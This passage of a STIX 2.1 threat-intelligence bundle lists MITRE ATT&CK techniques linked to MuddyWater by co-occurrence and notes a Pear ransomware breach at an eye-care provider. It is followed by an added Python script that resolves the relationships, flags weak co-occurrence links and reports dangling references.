"description": "Tri-Century Eye Care is a healthcare organization that was recently targeted by the Pear ransomware group, resulting in a significant data breach. The organization provides eye care services and was impacted by the ransomware attack, which led to the theft of over 3 Tb of data.",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--280ebd89-59bc-4ae2-a9db-1c01a56e50dc",
"name": "Exploit Public-Facing Application",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access"
}
],
"x_mitre_id": "T1190",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1190/",
"external_id": "T1190"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--e5974f70-5745-450a-908a-6483ad9c4678",
"name": "Exploitation for Client Execution",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
}
],
"x_mitre_id": "T1203",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1203/",
"external_id": "T1203"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--771ed4e5-6dde-43a8-9c72-d006b0c83e3d",
"name": "Command and Scripting Interpreter",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
}
],
"x_mitre_id": "T1059",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1059/",
"external_id": "T1059"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--13fc9cbe-9444-4eba-872b-a44565ae3ab7",
"name": "Supply Chain Compromise",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access"
}
],
"x_mitre_id": "T1195",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1195/",
"external_id": "T1195"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--ce39e6f2-b20f-421e-83e1-242a773e1927",
"name": "Create or Modify System Process",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"x_mitre_id": "T1543",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1543/",
"external_id": "T1543"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--d5229cf6-f11b-41bc-8aca-0df713047400",
"name": "Boot or Logon Autostart Execution",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"x_mitre_id": "T1547",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1547/",
"external_id": "T1547"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--4a2578d4-fdf6-48d3-b66a-93c681e1e21e",
"name": "Application Layer Protocol",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "command-and-control"
}
],
"x_mitre_id": "T1071",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1071/",
"external_id": "T1071"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--68a5c7b8-09b4-49b1-8149-bc23ed0260c9",
"name": "Non-Application Layer Protocol",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "command-and-control"
}
],
"x_mitre_id": "T1095",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1095/",
"external_id": "T1095"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--06cf8802-38e4-4421-a699-33a0bae74d96",
"name": "System Information Discovery",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "discovery"
}
],
"x_mitre_id": "T1082",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1082/",
"external_id": "T1082"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--2e52cc86-c2ef-43d7-9f1e-2fc59c4845ee",
"name": "File and Directory Discovery",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "discovery"
}
],
"x_mitre_id": "T1083",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1083/",
"external_id": "T1083"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"confidence": 90,
"type": "attack-pattern",
"id": "attack-pattern--943edc6f-c0f9-48f1-b8d4-4666aa0abae1",
"name": "Process Discovery",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "discovery"
}
],
"x_mitre_id": "T1057",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1057/",
"external_id": "T1057"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"confidence": 70,
"type": "attack-pattern",
"id": "attack-pattern--12a5aa0e-cd1f-4614-97d0-872085aa494b",
"name": "Exploitation of Remote Services",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "lateral-movement"
}
],
"x_mitre_id": "T1210",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1210/",
"external_id": "T1210"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"confidence": 70,
"type": "attack-pattern",
"id": "attack-pattern--d2a77ce3-d278-4f77-97f0-227b744a33d3",
"name": "Archive via Utility",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "collection"
}
],
"x_mitre_id": "T1560.001",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1560/001/",
"external_id": "T1560.001"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"confidence": 70,
"type": "attack-pattern",
"id": "attack-pattern--27b36b6d-ae90-4767-b07a-563ecef589ea",
"name": "Scheduled Task",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"x_mitre_id": "T1053.005",
"external_references": [
{
"source_name": "MITRE ATT&CK",
"url": "https://attack.mitre.org/techniques/T1053/005/",
"external_id": "T1053.005"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"mitre-attack"
]
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--e9f7f400-7343-4f4c-b1f7-1b243b366842",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--280ebd89-59bc-4ae2-a9db-1c01a56e50dc",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Exploit Public-Facing Application (T1190) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--46cd00ec-6ce0-4a79-a1ec-7fa01bc57d3e",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--e5974f70-5745-450a-908a-6483ad9c4678",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Exploitation for Client Execution (T1203) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--655b3935-b3e7-47bd-bcf0-b2e168687c59",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--771ed4e5-6dde-43a8-9c72-d006b0c83e3d",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Command and Scripting Interpreter (T1059) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--f7a31206-4513-420a-ad4c-686d6045b5ad",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--13fc9cbe-9444-4eba-872b-a44565ae3ab7",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Supply Chain Compromise (T1195) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--ea4f3740-3edf-4a49-b4ff-cec4313ccc87",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--ce39e6f2-b20f-421e-83e1-242a773e1927",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Create or Modify System Process (T1543) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--45fe84ee-efbe-4421-bb01-e6d6641f64f8",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--d5229cf6-f11b-41bc-8aca-0df713047400",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Boot or Logon Autostart Execution (T1547) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--d5e1003d-1187-486a-9a30-ab8e28d6248a",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--4a2578d4-fdf6-48d3-b66a-93c681e1e21e",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Application Layer Protocol (T1071) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--334da1c4-6e96-4dfb-a37f-984be7b542d9",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--68a5c7b8-09b4-49b1-8149-bc23ed0260c9",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Non-Application Layer Protocol (T1095) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--33c60d98-4dad-4c7a-8872-61ab39baa8f3",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--06cf8802-38e4-4421-a699-33a0bae74d96",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and System Information Discovery (T1082) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--eb4226af-9bb3-4855-931d-5d44d13c87bb",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--2e52cc86-c2ef-43d7-9f1e-2fc59c4845ee",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and File and Directory Discovery (T1083) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--07b73f78-11ff-4e5e-8f6f-f1dec9870e28",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--943edc6f-c0f9-48f1-b8d4-4666aa0abae1",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Process Discovery (T1057) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--8d8423e2-43b6-42fa-ac15-447aa227ccae",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--12a5aa0e-cd1f-4614-97d0-872085aa494b",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Exploitation of Remote Services (T1210) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--1e041532-9123-49fd-8932-0d4ac5538268",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--d2a77ce3-d278-4f77-97f0-227b744a33d3",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Archive via Utility (T1560.001) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--f41170b8-68af-413c-99d6-303751d2d9b1",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--27b36b6d-ae90-4767-b07a-563ecef589ea",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Scheduled Task (T1053.005) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
}
]
}
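The relationship objects above all carry `"confidence": 60` and `"x_validation_method": "mitre-cooccurrence"`: each one says only that MuddyWater and a technique were mentioned in the same intelligence, not that the technique was observed in use. Before such a bundle feeds a detection backlog or a threat profile, a practitioner would want to resolve the `source_ref`/`target_ref` pairs to names, separate co-occurrence links from confirmed ones, and catch references that do not resolve inside the bundle. The script below is an added example for that purpose, not code from the feed that produced this bundle or from any STIX or ATT&CK library; it uses only the Python standard library. The constructed sample bundle reuses attack-pattern and relationship IDs from the page, but the `threat-actor` object, the bundle `id`, the `analyst-confirmed` relationship and the treatment of a missing `confidence` as 0 are assumptions made for the example.

```python
"""Added example: resolve the 'uses' relationships in a STIX 2.1 bundle like
the one above into a per-actor technique list, flag links that exist only
because of co-occurrence, and report references that do not resolve."""
import json
from collections import defaultdict

TS = "2025-12-08T13:54:59.238Z"
ACTOR = "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909"
SCHED = "attack-pattern--27b36b6d-ae90-4767-b07a-563ecef589ea"
ARCHIVE = "attack-pattern--d2a77ce3-d278-4f77-97f0-227b744a33d3"
# Referenced by a relationship on the page but deliberately left out of this
# sample bundle so the dangling-reference check has something to find.
EXPLOIT_PUBLIC = "attack-pattern--280ebd89-59bc-4ae2-a9db-1c01a56e50dc"


def rel(rid, target, confidence, method):
    """Build a 'uses' relationship object shaped like the ones on the page."""
    return {"type": "relationship", "spec_version": "2.1", "id": rid,
            "created": TS, "modified": TS, "relationship_type": "uses",
            "source_ref": ACTOR, "target_ref": target,
            "confidence": confidence, "x_validation_method": method}


# Constructed sample bundle (serialised, so the loader parses real JSON text).
# The threat-actor object, bundle id and the final analyst-confirmed
# relationship are assumptions; the other IDs are copied from the page.
SAMPLE_BUNDLE = json.dumps({
    "type": "bundle",
    "id": "bundle--00000000-0000-4000-8000-000000000001",
    "objects": [
        {"type": "threat-actor", "spec_version": "2.1", "id": ACTOR,
         "created": TS, "modified": TS, "name": "MuddyWater"},
        {"type": "attack-pattern", "spec_version": "2.1", "id": SCHED,
         "created": TS, "modified": TS, "name": "Scheduled Task",
         "x_mitre_id": "T1053.005",
         "external_references": [{"source_name": "MITRE ATT&CK",
                                  "external_id": "T1053.005",
                                  "url": "https://attack.mitre.org/techniques/T1053/005/"}]},
        # No external_references here, to exercise the x_mitre_id fallback.
        {"type": "attack-pattern", "spec_version": "2.1", "id": ARCHIVE,
         "created": TS, "modified": TS, "name": "Archive via Utility",
         "x_mitre_id": "T1560.001"},
        rel("relationship--f41170b8-68af-413c-99d6-303751d2d9b1", SCHED, 60, "mitre-cooccurrence"),
        rel("relationship--1e041532-9123-49fd-8932-0d4ac5538268", ARCHIVE, 60, "mitre-cooccurrence"),
        rel("relationship--e9f7f400-7343-4f4c-b1f7-1b243b366842", EXPLOIT_PUBLIC, 60, "mitre-cooccurrence"),
        # Constructed: a higher-confidence link with a non-co-occurrence method.
        rel("relationship--00000000-0000-4000-8000-000000000002", SCHED, 85, "analyst-confirmed"),
    ],
})


def load_bundle(text):
    """Parse JSON text and check it has the shape of a STIX bundle."""
    bundle = json.loads(text)
    if bundle.get("type") != "bundle" or not isinstance(bundle.get("objects"), list):
        raise ValueError("not a STIX 2.1 bundle")
    return bundle


def index_objects(bundle):
    """Map every object id to its object; ids must be unique within a bundle."""
    index = {}
    for obj in bundle["objects"]:
        oid = obj.get("id")
        if not oid:
            raise ValueError("object without id")
        if oid in index:
            raise ValueError(f"duplicate id {oid}")
        index[oid] = obj
    return index


def technique_id(pattern):
    """Prefer the ATT&CK external_id; fall back to the custom x_mitre_id."""
    for ref in pattern.get("external_references", []):
        if ref.get("source_name") == "MITRE ATT&CK" and ref.get("external_id"):
            return ref["external_id"]
    return pattern.get("x_mitre_id", "?")


def actor_techniques(bundle, min_confidence=0, weak_methods=("mitre-cooccurrence",)):
    """Return (techniques, dangling).

    techniques: {actor name: [records]} for threat-actor -> attack-pattern
    'uses' relationships at or above min_confidence, each record flagged
    'weak' when its x_validation_method is in weak_methods.
    dangling: ids of 'uses' relationships whose source or target is absent.
    A missing confidence is treated as 0 (assumption: STIX leaves it unspecified).
    """
    index = index_objects(bundle)
    result = defaultdict(list)
    dangling = []
    for obj in bundle["objects"]:
        if obj.get("type") != "relationship" or obj.get("relationship_type") != "uses":
            continue
        src = index.get(obj.get("source_ref"))
        dst = index.get(obj.get("target_ref"))
        if src is None or dst is None:
            dangling.append(obj["id"])
            continue
        if src.get("type") != "threat-actor" or dst.get("type") != "attack-pattern":
            continue
        confidence = obj.get("confidence", 0)
        if confidence < min_confidence:
            continue
        result[src["name"]].append({
            "technique": technique_id(dst), "name": dst.get("name"),
            "confidence": confidence,
            "method": obj.get("x_validation_method", "unspecified"),
            "weak": obj.get("x_validation_method") in weak_methods,
        })
    for recs in result.values():  # strongest evidence first
        recs.sort(key=lambda r: (-r["confidence"], r["technique"]))
    return dict(result), dangling


if __name__ == "__main__":
    techniques, dangling = actor_techniques(load_bundle(SAMPLE_BUNDLE))
    for actor, recs in techniques.items():
        for r in recs:
            tag = "WEAK" if r["weak"] else "OK  "
            print(f"{tag} {actor}: {r['technique']} {r['name']} conf={r['confidence']} via {r['method']}")
    for rid in dangling:
        print(f"DANGLING {rid}: source_ref or target_ref not in bundle")
```

Running it with `min_confidence=70` keeps only the constructed analyst-confirmed link and drops every co-occurrence relationship; the page's relationship `e9f7f400` shows up as dangling here only because the sample omits its target object, which is the check you want when a bundle has been truncated or filtered upstream.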